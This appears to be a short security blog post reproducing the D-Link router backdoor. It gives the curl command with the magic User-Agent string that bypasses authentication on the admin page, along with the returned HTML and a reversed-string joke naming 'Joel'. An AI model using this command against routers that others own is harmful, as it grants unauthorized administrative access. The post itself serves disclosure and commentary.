D-Link Backdoor Fun
Uh Oh…
Interestingly enough I was messing around with my D-Link router this weekend and found a number of web application vulnerabilities (I’ve contacted D-Link but haven’t heard back - they’ll most likely be busy tomorrow though with this MUCH WORSE “vulnerability”), and this popped up in my twitter feed. This is a news story regarding this blog post.
So I did:
curl -A "xmlset_roodkcableoj28840ybtide" http://192.168.0.1/tools_admin.php
Which returned:
<html>
<head>
<meta http-equiv=Content-Type content="no-cache">
<meta http-equiv=Content-Type content="text/html; charset=utf-8">
<title>D-LINK SYSTEMS, INC | WIRELESS ROUTER | HOME</title>
<script>
-snip-
/* parameter checking */
function check()
{
var f=get_obj("frm");
if(is_blank(f.admin_name.value))
{
alert("Please input the Login Name.");
f.admin_name.select();
return false;
}
else if(strchk_hostname(f.admin_name.value)==false)
{
alert("The Login Name is with invalid character. Please check it.");
f.admin_name.select();
return false;
}
if(strchk_unicode(f.admin_password1.value)==true)
{
alert("The New Password is with invalid character. Please check it.");
f.admin_password1.select();
return false;
}
if(f.admin_password1.value!=f.admin_password2.value)
{
alert("The New Password and Confirm Password are not matched.");
f.admin_password1.select();
return false;
}
-snip-
Well that’s not good. Full authentication bypass.
Something funny that I found in the comments of the Reddit /r/netsec thread:
$ ruby -e 'puts "xmlset_roodkcableoj28840ybtide".reverse'
editby04882joelbackdoor_teslmx
Well, if Joel’s still around I’m not sure how much longer he’ll be at his job. Damn…
Update: There has been some speculation that this backdoor is merely functionality: http://pastebin.com/aMz8eYGa